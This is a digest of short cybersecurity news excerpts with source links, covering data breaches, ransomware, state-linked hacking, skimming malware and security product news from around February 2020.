|
Details of 10.6 million MGM hotel guests posted on a hacking forum
The personal details of more than 10.6 million users who stayed at MGM Resorts hotels have been published on a hacking forum this week. Besides details for regular tourists and travelers, included in the leaked files are also personal and contact details for celebrities, tech CEOs, reporters, government officials, and employees at some of the world's largest tech companies.
https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/
Data breach hits agency overseeing White House communications
The US Department of Defence confirmed that computer systems controlled by the Defence Information Systems Agency (DISA) had been hacked, exposing the personal data of about 200,000 people. The agency oversees military communications including calls for US President Donald Trump. The data exposed included names and social security numbers. The agency is responsible for the military cyber-security and it sets up communications networks in combat zones.
https://www.bbc.com/news/technology-51580925
Hacked Off: Patients Sue Ransom-Paying Hospital Group
The lawsuit filed against Edison, N.J.-based Hackensack Meridian Health, which has 17 hospitals and other care locations in the state, seeks damages for the patients affected. [...] "As a consequence of the ransomware locking down the medical records ... plaintiffs and class members had to, among other things, forego medical care and treatment or had to seek alternative care and treatment," the lawsuit alleges.
https://www.bankinfosecurity.com/hmh-lawsuit-a-13736
Cyberattack on NRC Health sparks privacy concerns about private patient records stored by US hospitals
With NRC’s systems down, one chief information officer at a hospital said that it’s been a “major source of irritation internally,” because the systems are used to determine how much its physicians are getting paid. [...] There are also brewing concerns about whether NRC will determine that there was a breach of patient data, according to the source. If private information was accessed, hospitals will need to notify their patients.
https://www.cnbc.com/2020/02/20/nrc-health-cyberattack-sparks-privacy-concerns-about-patient-records-in-us.html
APIs latest target for cyber attacks on financial services firms: Akamai
However, some attacks used a mix of API targeting and other methodologies, the official release notes. On August 7 last year, Akamai recorded the single largest credential stuffing attack against a financial services firm in its history, consisting of 55,141,782 malicious login attempts. The top attack against the financial services sector was Local File Inclusion with 47 per cent observed traffic, followed by Cross-Site Scripting (XSS) and Denial of Service (DoS) attacks.
https://www.devdiscourse.com/article/technology/884566-apis-latest-target-for-cyber-attacks-on-financial-services-firms-akamai
PayPal ‘Critical’ Login Hack: New Report Warns You Are Now At Risk From Thieves
First came the confirmation that an authentication hack would enable an attacker to access an account once credentials had been phished, bypassing the financial firm’s authentication tools. And now another security report claims the entire authentication process can be bypassed, enabling an attacker to gain access to an account with nothing but stolen credentials, available for purchase on the dark web “for as little as $1.50.”
https://www.forbes.com/sites/zakdoffman/2020/02/22/paypal-critical-login-hack-new-report-warns-you-are-at-risk-from-thieves-heres-the-reality/#3ea8c8b445e2
An open letter to cyber security policy makers
It is imperative that cyber security policy makers take into account the unique technical and policy/governance issues associated with control systems. Current cyber security policies often have made control systems more susceptible to unintentional or malicious attacks because of the lack of input from the engineering organizations. This culture/governance gap needs to change.
https://www.controlglobal.com/blogs/unfettered/an-open-letter-to-cyber-security-policy-makers-control-system-cyber-security-is-different-than-it-and-requires-an-understanding-of-issues-unique-to-control-systems/
Silent Cyber - Recent court decision considers whether data is insurable tangible property loss
The Court sided with NIS and held that the insurer improperly denied the claim: NIS could recover under the Policy based on either the loss of data and software, or the loss of functionality of the computer system itself. In so holding, the Court relied on decisions from other federal jurisdictions which previously held that data or software can be susceptible to physical loss or damage.
https://www.jdsupra.com/legalnews/silent-cyber-recent-court-decision-68129/
ISS World faces cyber-attack; employees worldwide left offline
The websites of the company that employs half a million employees worldwide has been down since 17 February. 43,000 of the group's employees including 4,000 in the UK currently had no access to their emails, ThisWeekinFM reported on 20 February. ISS is yet to confirm the origin or perpetrators of the attack, but a BBC report has attributed ransomware.
https://www.scmagazineuk.com/iss-world-faces-cyber-attack-employees-worldwide-left-offline/article/1674690
U.S. joins other nations in accusing Russia of cyber attack in Republic of Georgia
Secretary of State Mike Pompeo and the Pentagon said in statements that the Russian military intelligence agency known as the GRU had carried out the attack. [...] “This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries,” Pompeo said. “These operations aim to sow division, create insecurity, and undermine democratic institutions.”
https://www.washingtonpost.com/national-security/2020/02/20/us-joins-others-accusing-russia-cyber-attack-republic-georgia/
Chinese-linked hacking group using Windows backdoors to go after gambling industry targets
Upon further investigation, it wasn’t immediately clear if the group itself, which Trend Micro has dubbed “DRBControl,” is a newcomer, according to Trend Micro researchers Daniel Lunghi, Cedric Pernet, Kenney Lu, and Jamz Yaneza. [...] “The exfiltrated data was mostly comprised of databases and source codes, which leads us to believe that the campaign is used for cyberespionage or gaining competitive intelligence,” researchers write.
https://www.cyberscoop.com/trend-micro-chinese-hacking-group-new-backdoors-gambling/
Cyberthefts Help North Korea Offset Revenue Lost to Sanctions
According to a report released by the U.N. Panel of Experts in August 2019, North Korea generated as much as $2 billion by conducting cyberattacks on banks and cryptocurrency exchanges, offsetting the amount the regime lost from sanctions. North Korea’s state-sponsored hackers conducted online bank and cryptocurrency heists in 17 countries, including Bangladesh, Chile, India, Poland, South Korea and South Africa, according to the U.N. report.
https://www.voanews.com/east-asia-pacific/cyberthefts-help-north-korea-offset-revenue-lost-sanctions
Massive DDoS Attack Shuts Down Iran’s Internet, Tehran Blames Washington
The head of Iran Civil Defense has accused Washington of the latest large-scale cyber-attack that targeted Iranian infrastructure. The coordinated Distributed Denial of Service (DDoS) attack affected two mobile operators and partially shut down Iran’s internet for hours. Iranian officials said they stopped the DDoS attack after activating Iran’s digital fortress DZHAFA shield.
https://www.cpomagazine.com/cyber-security/massive-ddos-attack-shuts-down-irans-internet-tehran-blames-washington/
Magecart Group 12 named as actor behind Olympic ticket POS attack
The ticket reselling sites olympictickets2020.com and eurotickets2020.com reportedly have been compromised with Magecart POS skimming malware. [...] Group 12 employs base64 encoded checks against the URL looking for the word “checkout” to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL, RiskIQ said.
https://www.scmagazine.com/home/security-news/malware/magecart-group-12-named-as-actor-behind-olympic-ticket-pos-attack/
Hacker Tied to Katie Hill Arrested for Cyber Attack on Her Opponent
The FBI on Friday arrested a man married to a staffer for former Democratic representative Katie Hill for a hacking spree against one of Hill's political opponents. Arthur Dam, the husband of Hill's campaign fundraiser and eventual district director Kelsey O’Hara, is charged with intentionally damaging and attempting to damage a protected computer for committing cyber attacks against Hill's Democratic rival Bryan Caforio.
https://freebeacon.com/politics/here-comes-throuple-hacker-tied-to-katie-hill-arrested-for-cyber-attack-on-her-opponent/
Airbnb Just Launched New Surveillance Bugs To Make Sure Guests Behave
So this is creepy. Airbnb, the world’s leading short-term rental platform has put aside the stories of hosts secretly spying on guests to launch a range of its own surveillance devices. [...] Functionality varies: Whereas the Minut device “monitors noise, temperature, motion, humidity and alarms when your property is unoccupied,” the Noise Aware Indoor Sensor “will alert you within minutes of sustained noise levels, not instantaneous noises like doors slamming,” and is being marketed as “the best way to protect your home, your neighbors, and your reputation.”
https://www.forbes.com/sites/zakdoffman/2020/02/23/airbnb-just-launched-these-intrusive-new-surveillance-bugs-to-ensure-you-all-behave/?ss=consumertech#7d12c3454719
Microsoft Brings Defender Antivirus for Linux, Coming Soon for Android and iOS
Almost within a year after releasing Microsoft Defender Advanced Threat Protection (ATP) for macOS computers, Microsoft today announced a public preview of its antivirus software for various Linux distributions, including Ubuntu, RHEL, CentOS and Debian. If this news hasn't gotten you excited yet... Microsoft is also planning to soon release Defender ATP anti-malware apps for smartphones and other devices running Google's Android and Apple's iOS mobile operating systems.
https://thehackernews.com/2020/02/windows-defender-atp-linux-android.html
Duped into running bogus virus scans at Office Depot? Dry your eyes with a small check from $35m settlement
The payouts come from a 2019 settlement the retail giant reached with the FTC, after the biz was accused of letting employees and a computer support provider trick punters into paying for unneeded malware cleanup and security software. Office Depot agreed to fork out $25m while not admitting liability. The regulator said that, between 2009 and 2016, the retailer and its partner company, support.com, used a rigged scanning tool that returned false positives for malware infections.
https://www.theregister.co.uk/2020/02/21/ftc_office_depot_fefunds/
Google Confirms ‘Malicious’ Security Threats Hiding On Play Store: Delete These 12 Apps Now
Google is investing to battle malicious apps, but given the current state it’s not enough.” That issue is made crystal clear by new research released today—two separate threats actively hiding on the Play Store: Joker malware that has slipped the security net and the new danger of Haken. Both have driven large numbers of downloads, both have prompted Google to confirm it has removed all of the infected apps identified thus far, both now require users to delete any installs.
https://www.forbes.com/sites/zakdoffman/2020/02/21/google-confirms-malicious-security-threats-hiding-on-android-play-store-delete-these-12-apps-now/#e2d09099fc2b
The CIA Won't Admit It Uses Slack
The NSA, responding to a similar request, admitted that it had records responsive to the request—that the agency uses the demonic chat app, in other words—but said it couldn’t release them because they were a state secret. Recently, the CIA replied to our request by saying this: CIA can neither confirm nor deny the existence or nonexistence of records responsive to your request. The fact of the existence or nonexistence of such records is itself currently and properly classified
https://www.vice.com/en_us/article/v74ymx/the-cia-wont-admit-they-use-slack
|
